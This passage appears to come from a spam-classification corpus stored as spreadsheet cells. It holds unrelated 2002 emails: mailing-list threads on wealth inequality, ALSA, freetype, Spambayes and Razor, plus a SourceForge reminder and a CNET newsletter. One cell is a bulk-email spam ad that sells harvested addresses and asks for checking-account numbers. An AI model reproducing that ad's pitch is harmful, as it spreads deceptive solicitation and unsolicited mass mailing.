 &gt;&gt; for descendants of the original inhabitants. Even for the descendents
 &gt;&gt; of slaves, who were brought here by force.
 &gt;&gt;
 &gt;&gt; More stuff, cheaper. That's progress.
 &gt;&gt;
 &gt;&gt; Poverty, of course, is not relative. It's absolute. Disparity in
 &gt;&gt; wealth has nothing to do with it.
 &gt;&gt;
 &gt;&gt; It's like saying that groups have rights, when, in truth, only
 &gt;&gt; individuals do. Like group rights, "disparity" in wealth is
 &gt;&gt; statistical sophistry.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; Besides, even if you can't help the distribution, industrial wealth
 &gt;&gt; is almost always transitory, and so is relative poverty, even when
 &gt;&gt; there are no confiscatory death-taxes. The 20th anniversary Forbes
 &gt;&gt; 400 just came out, and only a few tens of people are still there
 &gt;&gt; since 1982, a time which had significantly higher marginal taxes on
 &gt;&gt; wealth, income, and inheritance than we do now. More to the point,
 &gt;&gt; they're nowhere near the top.
 &gt;&gt;
 &gt;&gt;
 Lovely quote from the Forbes 400 list:
 "and not a single Astor, Vanderbilt or Morgan rates a mention on the
 current Forbes Four Hundred. "
 But you have to studiously ignore the 4 Rockefellers, 3 Gettys, 3
 Hearsts,  Fords, Kelloggs, Wrigleys,
 and so on.
 There are more self-made people on the list than I previously alluded to
 - I made a mistake. Most
 of them seem to have Ivy League educations, or are Ivy League dropouts,
 suggesting to me that they weren't
 exactly poor to start with. Some of them have lovely self-made stories
 like:
 #347, Johnston, Summerfield K Jr
 track this personTrack This Person
 &lt;http://www.forbes.com/peopletracker/add_person.jhtml?successURL=%2Fpeopletr
 acker%2Fprotected%2Frich_tracker.jhtml&amp;errorURL=%2Fpeopletracker%2Ferror.jht
 ml&amp;personId=221899&gt;
  | See all Bacon Makers
 &lt;http://www.forbes.com/lists/results.jhtml?passListId=54&amp;passYear=2002&amp;passL
 istType=Person&amp;resultsStart=1&amp;resultsHowMany=25&amp;resultsSortProperties=%2Bnum
 berfield1%2C%2Bstringfield1&amp;resultsSortCategoryName=rank&amp;searchParameter1=10
 Str%7C%7CPatCS%7C%7CBacon+Makers&amp;category1=Magazine+Section&amp;category2=catego
 ry&amp;searchParameter2=unset&gt;
 70 , self made
 *Source: Food
 &lt;http://www.forbes.com/lists/results.jhtml?passListId=54&amp;passYear=2002&amp;passL
 istType=Person&amp;resultsStart=1&amp;resultsHowMany=25&amp;resultsSortProperties=%2Bnum
 berfield1%2C%2Bstringfield1&amp;resultsSortCategoryName=rank&amp;searchParameter1=5S
 tr%7C%7CPatCS%7C%7CFood&amp;category1=Industry&gt;,
 Coca-Cola* (quote
 &lt;http://www.forbes.com/finance/mktguideapps/compinfo/CompanyTearsheet.jhtml?
 tkr=CCE&gt;,
 executives
 &lt;http://www.forbes.com/peopletracker/results.jhtml?startRow=0&amp;name=&amp;ticker=C
 CE&gt;,
 news &lt;http://markets2.forbes.com/rpt/Company_News.asp?Symbol=CCE&gt;)
 Net Worth: *$680 mil* returnee
 Hometown: Chattanooga , TN
 *Marital Status:* married , 5 children
 Grandfather James and partner landed first Coca-Cola bottling franchise
 in 1899. Company passed down 3 generations to Summerfield 1950s. Became
 largest independent Coke bottler. Merged with Coca-Cola Enterprises 1991.
 &lt;javascript:openMap('pol');&gt; &lt;javascript:openMap('dist');&gt;
 (...by a compensation committee)
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: (SPAM? 08.00) lists.sourceforge.net mailing list memberships reminder
</t>
  </si>
  <si>
    <t>******************************************************************************* 
 This is an official mailing from SourceForge.net.  You are receiving
 this message because you had previously subscribed to one of the more
 than 20,000 opt-in mailing lists managed by SourceForge.net for the
 projects hosted on SourceForge.net.  This message is a monthly
 subscription reminder, automatically generated by the Mailman mailing
 list management software used by SourceForge.net
 (http://www.list.org).
 DO NOT REPLY to this email; instructions are provided here for
 unsubscribing from a list, and for obtaining support.  Support is not
 provided by email.
 To UNSUBSCRIBE:
  1. Use your web browser to access the list management URL for the
     list you wish to unsubscribe from (the list management URL for
 each
     list may be found at the bottom of this email).
  2. If you do not already know your list management password, click on
 the
     'Email My Password To Me' button.  List passwords will differ from
     list-to-list, and are different from the password you use on the
     SourceForge.net site, if you have an account there.
  3. From the list management page, enter your list password (see step
 #2,
     above, if you do not know your list password) in to the
     'Unsubscribing from...' box, found in the upper right-hand corner
 of
     the list management page.
  4. After entering the password for your subscription and clicking on
 the
     'Unsubscribe' button, you will be unsubscribed from the list
 immediately.
  5. To unsubscribe from more than one list, you must access the
 management
     page for each, using the appropriate URL, listed at the bottom of
 this
     email.
 To contact SUPPORT staff:
  1. All mailing lists hosted by SourceForge.net are opt-in via a
 three-way
     handshake.  This is not a spam list; subscription to this list
     required you to respond to a confirmation email that was sent to
 your
     email address.
  2. SourceForge.net provides hosting for more than 20,000 different
     mailing lists; if you contact our support staff, you must provide
     A) the email address associated with this monthly mailing AND
     B) the list of mailing lists from the bottom of this mailing
     Without this information, it will be difficult to assist you.
  3. Support is not provided by email.  All support inquiries related
 to
     this mailing should be submitted as a Support Request at this URL:
     https://sourceforge.net/tracker/?func=add&amp;group_id=1&amp;atid=200001
     Proper issue reporting will help us to respond quickly.
 To change your subscription settings:
  1. Make use of the list management URL and password for the list
     in question; from the list management page, you may change your
     password or subscription preferences.
  2. If you do not already know your list management password, click on
 the
     'Email My Password To Me' button.  List passwords will differ from
     list-to-list, and are different from the password you use on the
     SourceForge.net site, if you have an account there.
 If your email address is changing:
  1. Access the URL provided for list management at the bottom of this
 email.
  2. Click on the name of the list, located at the bottom of the list
     management page (the link preceding the email address for the list
 admin).
  3. Follow the instructions in the 'Subscribing to...' section to
 subscribe
     your NEW email address to the list.
  4. Once subscribed, follow the instructions in the UNSUBSCRIBE
 section
     (above) to unsubscribe the old address from the list in question.
  NOTE: There is no means to change the email address on your
 subscriptions
  directly; use this procedure to change the subscriptions for each of
 the
  lists you subscribe to.
 If you are a list ADMINISTRATOR and have lost your list admin
 password:
  1. Follow the instructions in the SUPPORT section of this message
 (above)
     to request a reset of your list admin password.  Please include a
 list
     of the mailing lists whose passwords you need reset.  No automated
     facility is provided to reset list admin passwords.
 Please note: As of 2002-08-20, this mailing will no longer include the
 list management passwords for your subscriptions.  If you have lost
 your list management password, you will need to recover those
 passwords on a per-list basis as described in #2 of the UNSUBSCRIBE
 section, above.
 If you encounter a problem in accessing the mailing list management
 page for a list, please contact the SourceForge.net team (see our
 SUPPORT instructions, above) for assistance AFTER you try using a
 different web browser for accessing that page.
 Thank you,
 the SourceForge.net team
 (mailing list management URLs follow)
 *******************************************************************************
 This is a reminder, sent out once a month, about your
 lists.sourceforge.net mailing list memberships.  It includes your
 subscription info and how to use it to change it or unsubscribe from a
 list.
 You can visit the URLs to change your membership status or
 configuration, including unsubscribing, setting digest-style delivery
 or disabling delivery altogether (e.g., for a vacation), and so on.
 In addition to the URL interfaces, you can also use email to make such
 changes.  For more info, send a message to the '-request' address of
 the list (for example, qpopper-webdev-request@lists.sourceforge.net)
 containing just the word 'help' in the message body, and an email
 message will be sent to you with instructions.
 If you have questions, problems, comments, etc, send them to
 mailman-owner@lists.sourceforge.net.  Thanks!
 Subscriptions for shiva+qpopper-webdev@sewingwitch.com:
 List                                     // URL    
 ----                                     --------  
 qpopper-webdev@lists.sourceforge.net    
 https://lists.sourceforge.net/lists/options/qpopper-webdev/shiva%2Bqpopper-webdev%40sewingwitch.com</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-29 at 01:06, Matthias Saou wrote:
 &gt; &gt; &gt; Thanks a *lot* !  The RPMs seem to be fine, they worked for me out of
 &gt; &gt; &gt; the box (on vanilla Valhalla w/latest errata).
 &gt; &gt; 
 &gt; &gt; ...except that I don't see an init script in the RPMs, a sample one
 &gt; &gt; designed for RH is supposed to be in "utils/alsasound".  Could you take
 &gt; &gt; a look if it can be included?
 &gt; 
 &gt; It doesn't need to as Red Hat Linux already sets correct permissions on all
 &gt; ALSA audio devices for locally logged in users (through the console.perms
 &gt; file) and the modules.conf files takes care of loading the right modules on
 &gt; demand. Also, aumix and the scripts that come with Red Hat Linux still work
 &gt; for controlling the volume, so it's still saved and restored when the
 &gt; computer is halted, even using ALSA.
 Ah!  The mixer stuff was what made me look for an init script in the
 first place, I didn't bother to check whether the existing stuff would
 have worked with that.  Will try that out, you can assume silence ==
 success :)
 &gt; &gt;From what I can tell after only 2 days using it : ALSA rocks, especially
 &gt; since having a full OSS compatibility results that it breaks nothing at
 &gt; all! :-)
 Agreed.  Though with only 2 hours experience...
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Automated 30 day renewal reminder 2002-05-27
</t>
  </si>
  <si>
    <t xml:space="preserve">The following domains that are registered as belonging
 to you are due to expire within the next 60 days. If
 you would like to renew them, please contact
 nic@starflung.com; otherwise they will be deactivated
 and may be registered by another.
 Domain Name, Expiry Date
 nutmegclothing.com, 2002-06-26
</t>
  </si>
  <si>
    <t xml:space="preserve">You missed the part that said that spam is kept in the "eThunk" and was
 viewable by a simple viewer for final disposition?
 Of course, with Outbloat, you could fire up PythonWin and stuff the spam
 into the Junk Email folder... but then you loose the ability to retrain on
 the user classified ham/spam.
 David LeBlanc
 Seattle, WA USA
 &gt; -----Original Message-----
 &gt; From: spambayes-bounces+whisper=oz.net@python.org
 &gt; [mailto:spambayes-bounces+whisper=oz.net@python.org]On Behalf Of Tim
 &gt; Peters
 &gt; Sent: Friday, September 06, 2002 12:24
 &gt; To: spambayes@python.org
 &gt; Subject: RE: [Spambayes] Deployment
 &gt;
 &gt;
 &gt; [Guido]
 &gt; &gt; ...
 &gt; &gt; - A program that acts both as a pop client and a pop server.  You
 &gt; &gt;   configure it by telling it about your real pop servers.  You then
 &gt; &gt;   point your mail reader to the pop server at localhost.  When it
 &gt; &gt;   receives a connection, it connects to the remote pop servers, reads
 &gt; &gt;   your mail, and gives you only the non-spam.
 &gt;
 &gt; FYI, I'll never trust such a scheme:  I have no tolerance for false
 &gt; positives, and indeed do nothing to try to block spam on any of my email
 &gt; accounts now for that reason.  Deliver all suspected spam to a Spam folder
 &gt; instead and I'd love it.
 &gt;
 &gt;
 &gt; _______________________________________________
 &gt; Spambayes mailing list
 &gt; Spambayes@python.org
 &gt; http://mail.python.org/mailman-21/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Drivezilla -- 200GB Drives from Western Digital
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000210.html
 Date: 2002-10-01T15:24:02-08:00
 Wow. Check out Western Digital's Drivezilla. They've announced 200GB hard 
 disks. Something tells me that I'll have my own terabyte by the end of 2003....
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: attached data that can be stored for future use on a given computer
</t>
  </si>
  <si>
    <t xml:space="preserve">FIND PROSPECTS FOR YOUR BIZ/PRODUCTS...FAST !!
 DO YOU KNOW HOW TO USE E-MAIL?  Of course,
 You're on the internet contacting friends and colleagues.
 If you find sending e-mail easy and have failed at
 promoting your business, or just simply want to reach a
 " MASSIVE " amount of prospects, then you should be making 
 money "HAND OVER FIST" with ELECTRONIC MAIL !!
 GET READ, GET EXCITED!!  Direct Email if carried
 out properly, can make you money so fast it will make
 your head spin!  There are " TONS " of responsive
 buyers out there for just about anything you have 
 to sell, and we have the means for you to contact
 them directly.  We are dedicated to your success.
 We guarantee that what you are about to do will
 help you to UNLEASH A TIDAL WAVE OF
 RESPONSES!
 THIS IS A ONE-TIME OFFER TO QUALIFIED
 PROSPECTS AND WILL NOT LAST LONG FOR
 THIS  " DREAM COME TRUE " E-MAIL PACKAGE
 AT THE INCREDIBLE INVESTMENT OF $129.00
 We will deliver to you e-mail addresses on the CD-ROM.
 This will allow you to use these addresses IMMEDIATELY !
 1)  Receive the CD-ROMS  with (20,mil. incrediable)
      deliverable general Internet e-mail addresses
 2)  The Elec...delivery software (Electronic Mailer)
      aka "THE CADILLAC."  #1 on-line today.
 3)  #1 Money Makeing Opportunity On Line Today,
       Ready For "ELECTRONIC.. Mail Immediately....
 THIS IS VALUED AT OVER $400.00ON-LINE TODAY
 (savings of $270.00), AND IF THAT'S NOT ENOUGH,
 WE'LL EVEN THROW IN THE " INFORMATIONAL 
 INSTRUCTIONS " ON MASS E-MAIL MARKETING.
 YOU NEED TO GET STARTED QUICK !!
 WANT QUICK SERVICE?  YOU HAVE TWO (2) 
 OPTIONS: 1)  For your convenience,  live operators
 are available 9:00 am to 11:00 pm EST and would be
 more than happy to take your call. CALL NOW:
 Live Oper; (716) 812-2144
     Fax To:(253) 660-1235
 We accept Visa, Mastercard, Western Union(only) and check 
 debit 24 hours a day, seven (7) days a week. 
 please include your name as it appears on your check book
 when paying by check, please include
 the bank, check # and the long stream of numbers from
 left to right that appear at the bottom of the check.  PLEASE
 HAVE YOUR CHECK BOOK HANDY WHEN CALLING
 TO PLACE YOUR ORDER.
 http://www.mailcomesandgoes.com/ang/service.html
 If This Link Don,t Work Just Cut And Paste...Thanks !
 FIND PROSPECTS FOR YOUR BIZ/PRODUCTS...FAST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</si>
  <si>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RedHat 8.0 and his own freetype
</t>
  </si>
  <si>
    <t xml:space="preserve">I wrote:
 &gt; [The bytecode interpreter] may improve non-antialiased rendering, but
 &gt; only at the expense of making a mess of antialiased rendering.
 Then again, perhaps the particular font I'm using just has bad
 bytecodes.  That font is "QuickType II", grabbed off my Windows
 partition, where it was installed by I-have-no-idea-which-application.
 Anybody else experimenting with bytecode-enabled freetype, presumably
 with different fonts?  Do you find the same bad antialiased rendering
 that I found, or do other fonts work well?
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 09, 2002 at 10:05:29AM +1000,
 Adam Goryachev &lt;mailinglists@websitemanagers.com.au&gt; is thought to have said:
 &gt; &gt; Now I get some opt-in mail which looks to me like
 &gt; &gt; spam.  I hit "this is spam".  My trust rating plummets --
 &gt; 
 &gt; Good! Your opinion of what is spam is unreliable, and therefore, I don't
 &gt; *want* to trust you. IMHO, that is exactly the case that the trust system is
 &gt; supposed to sort out. People who incorrectly submit non-spam bulk mail to
 &gt; razor.
 Let's take a look at an example here. Someone on this list signed
 razor-users@fsckit.net up to a ZDNet mailing list that doesn't confirm
 subscriptions in a piss-poor attempt to mailbomb me. I report all of these
 mailings to Razor because, guess what, for me this is spam. This and a
 hundred more traditional spam emails to automated spamtrap addresses get 
 reported by me daily. I probably have a decent TES value because of all of
 this.
 Now lets say someone else who is also reporting a fair amount of your
 typical proxy/relayed spam has been reporting these and has built up a
 decent TES rating because of it. However they subscribed to that same ZDNet
 list and enjoy getting the mail from it except that they don't like seeing 
 it tagged as spam by Razor. So they razor-revoke it. 
 Who loses in this case? Why? Neither party is inaccurate in their actions
 IMO. But someone's standing is going to get hurt because of it.
 Tabor
 -- 
 --------------------------------------------------------------------
 Tabor J. Wells                                razor-users@fsckit.net
 Fsck It!                 Just another victim of the ambient morality
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] LCD monitors and linux
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 05:21:22PM +0100, Conor Daly wrote:
 &gt; My 17" CRT monitor having drowned in a flood (10cm squared of burned 
 &gt; circuit board URGH!) , I'm thinking of a 15" LCD as a replacement.  
 &gt; What with me going to the continent and all next week, I might wait and 
 &gt; buy one there (for a reasonable price (Dave Neary!  Any good sources?)).
 Conor - it's a rather large continent - people might need to know where you
 are going to suggest sources. And if you're buying abroad, make sure you get
 to test it - many places won't have facilities for you to do that.
 &gt; Question is: CAn I just plug in _any_ lcd monitor and expect it to work?  
 &gt; Are there special incantations needed for XFree86 to work.  Needless to
 &gt; say, it'll be a bit difficult to bring it back to the shop once I'm home 
 &gt; in Dublin and find it doesn't work!
 Any monitor should just work - they all have VGA connectors and any half
 decent brand will be know about by XFree setup programs in modern
 distributions. However, if you have the budget (insurance paying for the
 dead monitor, perhaps ? - and WHERE was your monitor that it got caught in a
 flood ?) getting a monitor with a DVI input is best. Of course, you'll need
 a DVI out video card then, too. DVI provides a much better picture than VGA
 because it removes the analog stage - basically DVI gives you a direct
 connection from video ram pixels to monitor pixels - the best pictures I've
 ever seen on a computer is on my notebook screen at 1400x1050 (which doesn't
 use DVI, but an internal connection which has the same effect). Brand wise,
 I like Iiyama a lot and I think they may have a Europe wide warranty.
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.COM: Jobs touts OS X, iPods, iMac
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Jobs touts OS X, iPods, iMac&lt;/title&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60Tkvp0A7fZsihsBSWgp7dR" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N1090.cnet/B926801.16;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=9a-b6_GQTMBaJXgw0pFigi7yr9FKgsR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqyARhu8pydDX7NdmUVSZR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WwvkFp-EnkHF6q-jPexAdR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwUkIdq6die23s1N87hJcR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkh4WR8dj0QzbMuLbLadRR"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17, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Jobs touts OS X, iPods, iMac&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Scient files for Chapter 11 &lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Yahoo Mail puts words in your mouth&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Unisys splits Intel server line &lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft sweetens Mac Office offer &lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 New chip may portend ATI comeback&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Perspectives&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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&lt;b&gt;Why free downloads help, not hurt&lt;/b&gt;&lt;br&gt;
 Recording artist Janis Ian argues that file swapping could actually help the industry, and its musicians.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXAWUBUR898BbBL7kOi_dR" &gt;Read Full Story&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Jobs touts OS X, iPods, iMac&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 NEW YORK--Apple Computer CEO Steve Jobs on Wednesday defended the company's switch to the Mac OS X operating system and unveiled new iPod digital-audio players and a new flat-panel iMac.
 Jobs used his keynote speech at the Macworld trade show here to make a flurry of other announcements as well, such as details about new syncing software, the next update to OS X and the end of free iTools.
 The most dramatic announcement focused on iPod. The new players include ones built specifically for computers that use Microsoft's Windows operating system.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 8:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXwPvzM19KMZ2Fz8IR7XcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Scient files for Chapter 11 &lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Internet consulting firm Scient has filed for Chapter 11 bankruptcy and agreed to sell certain assets to a professional services firm.
 The deal calls for Salt Lake City-based SBI to hire some of Scient's employees and to provide up to $4.9 million in financing, pending completion of the asset acquisition.
 Scient has been struggling for some time now. Once a dot-com darling, the company recently approved a 1-for-20 reverse stock split.
 The company and SBI said they expect the bankruptcy court to approve the deal, adding that financing "will allow Scient to continue to deliver services to its clients without interruption until court approval of SBI's acquisition is received."
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 8:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK89w27W-6ktQ3DlPfP8NRR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Yahoo Mail puts words in your mouth&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 What does Yahoo Mail have against mocha?
 That's what users of the company's free e-mail service may be wondering if they try to send a message using the word "mocha" and discover that while in transit, "mocha" mysteriously changes to "espresso."
 To protect users from malicious code, Yahoo uses an automated filter to swap out a handful of words such as "mocha" that pertain to Web code known as JavaScript.
 The reason is that e-mail sent in a form known as "Web enhanced" can contain JavaScript instructions that can run programs on the recipient's PC. JavaScript is a Web language that can issue commands such as telling the browser to open up other windows or to prompt a service to change a password, for example.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 4:00 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW1Yw_em9Z5VKc-3P0BlR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Unisys splits Intel server line &lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Unisys, a specialist in high-end servers, is coming out with a new lower-cost line of Intel-based servers as it gears up to promote the Itanium 2 chip.
 Unisys' new Aries servers accommodate as many as 16 Itanium 2 or Xeon processors and cost between $75,000 and $300,000, said Mark Fevertson, Unisys' vice president of server marketing. It joins the Orion line, which can use up to 32 Xeon or Itanium 2 processors and has been on sale for about two years at a cost between $140,000 and $700,000.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 10:40 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHOQrH9wKYjKHbtbXYzH4R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Microsoft sweetens Mac Office offer &lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 With sales of its Office suite for Mac OS X falling short of projections, Microsoft plans on Wednesday to announce a rebate for those who buy the software bundle when they pick up a new Mac.
 The promotion, which runs through Sept. 30, entails a $50 mail-in rebate for people buying a new Mac and upgrading to Office v. X, and $100 for those buying a Mac and the full version of the software. Microsoft is also offering two new pieces of downloadable software: one that lets Palm handhelds synchronize directly with Office v. X and another that lets the Macintosh view programs running on a Windows PC or server.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 3:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEI0tYt1xj7Bc1bJBykEmeR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;New chip may portend ATI comeback&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 ATI, once the leader in graphics chips, will launch its comeback bid this week with a new chip that experts say could put the company back in front in terms of performance.
 The Markham, Ontario-based company on Thursday will unveil the details of the Radeon 9700, a desktop graphics chip based on a new architecture that will provide greater realism when it comes to 3D images, according to sources.
 The fastest versions of the new chips will offer considerably higher performance than Nvidia's current GeForce4 roster, giving ATI the edge with gamers as well as PC makers, analysts said. And even after Nvidia--which began to chip away at ATI's leading spot in graphics in 1999--comes out with its GeForce 5 in a few months, the competition between the two will remain close.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK14an0Lhy6gJLkjCXMZHsR"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&lt;b&gt;Truth is in the iMac of the beholder&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 It's silly of Apple to try to squelch Internet rumors about its next moves. Jobs &amp; Co. should rejoice that fans care enough to gossip.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za61wn7d4CW5CH7esbKR9R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;eBags carries it off&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The dot-com boom's big spenders couldn't buy success, but this online luggage vendor survived by making frugality its watchword.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSOFz-NlQhaIHsSzky0uR"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href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRhaBmyrgVnxXFZcIuIsR"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href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkDhmdkvcRmBekeVktk2ZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2Fgaahem1kOqFb2GVaGdR"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href="http://clickthru.online.com/Click?q=01-9oXDI2jHs5W3jeUvurMPGPxZ6RcR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
